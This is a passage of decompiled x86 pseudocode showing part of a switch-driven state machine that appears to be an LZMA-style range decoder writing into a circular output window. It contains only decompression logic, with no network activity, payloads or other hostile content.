                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                              												 *(__ebp - 0x84) = 0xb;
                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              												goto L132;
                                                                                                                                                              											}
                                                                                                                                                              											__eax =  *(__ebp - 0x28);
                                                                                                                                                              											goto L89;
                                                                                                                                                              										case 0xb:
                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              												__ecx =  *(__ebp - 0x24);
                                                                                                                                                              												__eax =  *(__ebp - 0x20);
                                                                                                                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                              											} else {
                                                                                                                                                              												__eax =  *(__ebp - 0x24);
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x28);
                                                                                                                                                              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                              											L89:
                                                                                                                                                              											__ecx =  *(__ebp - 0x2c);
                                                                                                                                                              											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                              											L90:
                                                                                                                                                              											__eax =  *(__ebp - 4);
                                                                                                                                                              											 *(__ebp - 0x80) = 0x15;
                                                                                                                                                              											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                              											goto L69;
                                                                                                                                                              										case 0xc:
                                                                                                                                                              											L100:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0xc;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t335 = __ebp - 0x70;
                                                                                                                                                              											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t335;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											__eax =  *(__ebp - 0x2c);
                                                                                                                                                              											goto L102;
                                                                                                                                                              										case 0xd:
                                                                                                                                                              											L37:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0xd;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t122 = __ebp - 0x70;
                                                                                                                                                              											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t122;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											L39:
                                                                                                                                                              											__eax =  *(__ebp - 0x40);
                                                                                                                                                              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                              												goto L48;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags = __ebx - 0x100;
                                                                                                                                                              											if(__ebx >= 0x100) {
                                                                                                                                                              												goto L54;
                                                                                                                                                              											}
                                                                                                                                                              											L41:
                                                                                                                                                              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                              											 *(__ebp - 0x48) = __eax;
                                                                                                                                                              											__eax = __eax + 1;
                                                                                                                                                              											__eax = __eax << 8;
                                                                                                                                                              											__eax = __eax + __ebx;
                                                                                                                                                              											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              											__ax =  *__esi;
                                                                                                                                                              											 *(__ebp - 0x54) = __esi;
                                                                                                                                                              											__edx = __ax & 0x0000ffff;
                                                                                                                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												__cx = __ax;
                                                                                                                                                              												 *(__ebp - 0x40) = 1;
                                                                                                                                                              												__cx = __ax >> 5;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												__ebx = __ebx + __ebx + 1;
                                                                                                                                                              												 *__esi = __ax;
                                                                                                                                                              											} else {
                                                                                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                              												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              												0x800 = 0x800 - __edx;
                                                                                                                                                              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                              												 *__esi = __cx;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              												goto L39;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L37;
                                                                                                                                                              											}
                                                                                                                                                              										case 0xe:
                                                                                                                                                              											L46:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t156 = __ebp - 0x70;
                                                                                                                                                              											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t156;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L48:
                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                              													break;
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                              												__edx = __ebx + __ebx;
                                                                                                                                                              												__ecx =  *(__ebp - 0x10);
                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              													__cx = __ax;
                                                                                                                                                              													_t170 = __edx + 1; // 0x1
                                                                                                                                                              													__ebx = _t170;
                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              													continue;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L46;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											L54:
                                                                                                                                                              											_t173 = __ebp - 0x34;
                                                                                                                                                              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                              											__eflags =  *_t173;
                                                                                                                                                              											goto L55;
                                                                                                                                                              										case 0xf:
                                                                                                                                                              											L58:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t203 = __ebp - 0x70;
                                                                                                                                                              											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t203;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											L60:
                                                                                                                                                              											__eflags = __ebx - 0x100;
                                                                                                                                                              											if(__ebx >= 0x100) {
                                                                                                                                                              												L55:
                                                                                                                                                              												__al =  *(__ebp - 0x44);
                                                                                                                                                              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                              												goto L56;
                                                                                                                                                              											}
                                                                                                                                                              											L61:
                                                                                                                                                              											__eax =  *(__ebp - 0x58);
                                                                                                                                                              											__edx = __ebx + __ebx;
                                                                                                                                                              											__ecx =  *(__ebp - 0x10);
                                                                                                                                                              											__esi = __edx + __eax;
                                                                                                                                                              											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              											__ax =  *__esi;
                                                                                                                                                              											 *(__ebp - 0x54) = __esi;
                                                                                                                                                              											__edi = __ax & 0x0000ffff;
                                                                                                                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												__cx = __ax;
                                                                                                                                                              												_t217 = __edx + 1; // 0x1
                                                                                                                                                              												__ebx = _t217;
                                                                                                                                                              												__cx = __ax >> 5;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												 *__esi = __ax;
                                                                                                                                                              											} else {
                                                                                                                                                              												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              												0x800 = 0x800 - __edi;
                                                                                                                                                              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                              												 *__esi = __cx;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              												goto L60;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L58;
                                                                                                                                                              											}
                                                                                                                                                              										case 0x10:
                                                                                                                                                              											L110:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t366 = __ebp - 0x70;
                                                                                                                                                              											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t366;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											goto L112;
                                                                                                                                                              										case 0x11:
                                                                                                                                                              											L69:
                                                                                                                                                              											__esi =  *(__ebp - 0x58);
                                                                                                                                                              											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                              											L132:
                                                                                                                                                              											 *(_t612 - 0x54) = _t605;
                                                                                                                                                              											goto L133;
                                                                                                                                                              										case 0x12:
                                                                                                                                                              											goto L0;
                                                                                                                                                              										case 0x13:
                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              												_t469 = __ebp - 0x58;
                                                                                                                                                              												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                              												__eflags =  *_t469;
                                                                                                                                                              												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                              												 *(__ebp - 0x40) = 8;
                                                                                                                                                              												goto L144;
                                                                                                                                                              											}
                                                                                                                                                              											__eax =  *(__ebp - 0x4c);
                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                              											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                              											 *(__ebp - 0x30) = 8;
                                                                                                                                                              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                              											goto L130;
                                                                                                                                                              										case 0x14:
                                                                                                                                                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                              											__eax =  *(__ebp - 0x80);
                                                                                                                                                              											L140:
                                                                                                                                                              											 *(_t612 - 0x88) = _t533;
                                                                                                                                                              											goto L1;
                                                                                                                                                              										case 0x15:
                                                                                                                                                              											__eax = 0;
                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                              											__al = __al & 0x000000fd;
                                                                                                                                                              											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              											goto L121;
                                                                                                                                                              										case 0x16:
                                                                                                                                                              											__eax =  *(__ebp - 0x30);
                                                                                                                                                              											__eflags = __eax - 4;
                                                                                                                                                              											if(__eax >= 4) {
                                                                                                                                                              												_push(3);
                                                                                                                                                              												_pop(__eax);
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											 *(__ebp - 0x40) = 6;
                                                                                                                                                              											__eax = __eax << 7;
                                                                                                                                                              											 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                              											 *(__ebp - 0x58) = __eax;
                                                                                                                                                              											goto L145;
                                                                                                                                                              										case 0x17:
                                                                                                                                                              											goto L145;
                                                                                                                                                              										case 0x18:
                                                                                                                                                              											L146:
                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0x18;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t484 = __ebp - 0x70;
                                                                                                                                                              											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											__eflags =  *_t484;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											L148:
                                                                                                                                                              											_t487 = __ebp - 0x48;
                                                                                                                                                              											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                              											__eflags =  *_t487;
                                                                                                                                                              											goto L149;
                                                                                                                                                              										case 0x19:
                                                                                                                                                              											__eflags = __ebx - 4;
                                                                                                                                                              											if(__ebx < 4) {
                                                                                                                                                              												 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                              												L120:
                                                                                                                                                              												_t394 = __ebp - 0x2c;
                                                                                                                                                              												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                              												__eflags =  *_t394;
                                                                                                                                                              												L121:
                                                                                                                                                              												__eax =  *(__ebp - 0x2c);
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												if(__eax == 0) {
                                                                                                                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                              												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                              													goto L171;
                                                                                                                                                              												}
                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                              												__eax =  *(__ebp - 0x30);
                                                                                                                                                              												_t401 = __ebp - 0x60;
                                                                                                                                                              												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                              												__eflags =  *_t401;
                                                                                                                                                              												goto L124;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx = __ebx;
                                                                                                                                                              											__eax = __ebx;
                                                                                                                                                              											__ecx = __ebx >> 1;
                                                                                                                                                              											__eax = __ebx & 0x00000001;
                                                                                                                                                              											__ecx = (__ebx >> 1) - 1;
                                                                                                                                                              											__al = __al | 0x00000002;
                                                                                                                                                              											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                              											__eflags = __ebx - 0xe;
                                                                                                                                                              											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              											if(__ebx >= 0xe) {
                                                                                                                                                              												__ebx = 0;
                                                                                                                                                              												 *(__ebp - 0x48) = __ecx;
                                                                                                                                                              												L103:
                                                                                                                                                              												__eflags =  *(__ebp - 0x48);
                                                                                                                                                              												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                              													__eax = __eax + __ebx;
                                                                                                                                                              													 *(__ebp - 0x40) = 4;
                                                                                                                                                              													 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                              													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													L109:
                                                                                                                                                              													__ebx = 0;
                                                                                                                                                              													 *(__ebp - 0x58) = __eax;
                                                                                                                                                              													 *(__ebp - 0x50) = 1;
                                                                                                                                                              													 *(__ebp - 0x44) = 0;
                                                                                                                                                              													 *(__ebp - 0x48) = 0;
                                                                                                                                                              													L113:
                                                                                                                                                              													__eax =  *(__ebp - 0x40);
                                                                                                                                                              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                              														_t392 = __ebp - 0x2c;
                                                                                                                                                              														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                              														__eflags =  *_t392;
                                                                                                                                                              														goto L120;
                                                                                                                                                              													}
                                                                                                                                                              													__eax =  *(__ebp - 0x50);
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                              													__eax =  *(__ebp - 0x58);
                                                                                                                                                              													__esi = __edi + __eax;
                                                                                                                                                              													 *(__ebp - 0x54) = __esi;
                                                                                                                                                              													__ax =  *__esi;
                                                                                                                                                              													__ecx = __ax & 0x0000ffff;
                                                                                                                                                              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                              													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                              														__ecx = 0;
                                                                                                                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                              														__ecx = 1;
                                                                                                                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              														__ebx = 1;
                                                                                                                                                              														__ecx =  *(__ebp - 0x48);
                                                                                                                                                              														__ebx = 1 << __cl;
                                                                                                                                                              														__ecx = 1 << __cl;
                                                                                                                                                              														__ebx =  *(__ebp - 0x44);
                                                                                                                                                              														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                              														__cx = __ax;
                                                                                                                                                              														__cx = __ax >> 5;
                                                                                                                                                              														__eax = __eax - __ecx;
                                                                                                                                                              														__edi = __edi + 1;
                                                                                                                                                              														__eflags = __edi;
                                                                                                                                                              														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              														 *__esi = __ax;
                                                                                                                                                              														 *(__ebp - 0x50) = __edi;
                                                                                                                                                              													} else {
                                                                                                                                                              														 *(__ebp - 0x10) = __edx;
                                                                                                                                                              														0x800 = 0x800 - __ecx;
                                                                                                                                                              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                              														 *__esi = __dx;
                                                                                                                                                              													}
                                                                                                                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              														L112:
                                                                                                                                                              														_t369 = __ebp - 0x48;
                                                                                                                                                              														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                                                                                                              														__eflags =  *_t369;
                                                                                                                                                              														goto L113;
                                                                                                                                                              													} else {
                                                                                                                                                              														goto L110;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0xc);
                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                              													__ecx =  *(__ebp - 0x10);
                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              													__ebx = __ebx | 0x00000001;
                                                                                                                                                              													__eflags = __ebx;
                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              													L102:
                                                                                                                                                              													_t339 = __ebp - 0x48;
                                                                                                                                                              													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                                                                                                              													__eflags =  *_t339;
                                                                                                                                                              													goto L103;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L100;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											__edx =  *(__ebp - 4);
                                                                                                                                                              											__eax = __eax - __ebx;
                                                                                                                                                              											 *(__ebp - 0x40) = __ecx;
                                                                                                                                                              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                              											goto L109;
                                                                                                                                                              										case 0x1a:
                                                                                                                                                              											L56:
                                                                                                                                                              											__eflags =  *(__ebp - 0x64);
                                                                                                                                                              											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x68);
                                                                                                                                                              											__al =  *(__ebp - 0x5c);
                                                                                                                                                              											__edx =  *(__ebp - 8);
                                                                                                                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              											 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                              											__ecx =  *(__ebp - 0x14);
                                                                                                                                                              											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                              											__eax = __ecx + 1;
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              											__edx = _t192;
                                                                                                                                                              											goto L80;
                                                                                                                                                              										case 0x1b:
                                                                                                                                                              											L76:
                                                                                                                                                              											__eflags =  *(__ebp - 0x64);
                                                                                                                                                              											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__eax =  *(__ebp - 0x14);
                                                                                                                                                              											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              											}
                                                                                                                                                              											__edx =  *(__ebp - 8);
                                                                                                                                                              											__cl =  *(__eax + __edx);
                                                                                                                                                              											__eax =  *(__ebp - 0x14);
                                                                                                                                                              											 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              											 *(__eax + __edx) = __cl;
                                                                                                                                                              											__eax = __eax + 1;
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              											__edx = _t275;
                                                                                                                                                              											__eax =  *(__ebp - 0x68);
                                                                                                                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              											_t284 = __ebp - 0x64;
                                                                                                                                                              											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                                                              											__eflags =  *_t284;
                                                                                                                                                              											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              											L80:
                                                                                                                                                              											 *(__ebp - 0x14) = __edx;
                                                                                                                                                              											goto L81;
                                                                                                                                                              										case 0x1c:
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L124:
                                                                                                                                                              												__eflags =  *(__ebp - 0x64);
                                                                                                                                                              												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              													break;
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x14);
